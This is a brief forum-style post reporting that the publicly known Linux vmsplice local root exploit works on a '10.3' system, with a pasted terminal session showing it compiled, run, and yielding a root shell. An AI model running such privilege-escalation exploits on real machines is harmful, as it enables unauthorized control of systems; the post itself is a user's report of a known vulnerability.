Ouch: works for me on 10.3:
http://it.slashdot.org/article.pl?sid=08/02/10/2011257.
$ gcc local-root.c -o local-root $ ./local-root ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7e45000 .. 0xb7e77000 [+] root $ whoami root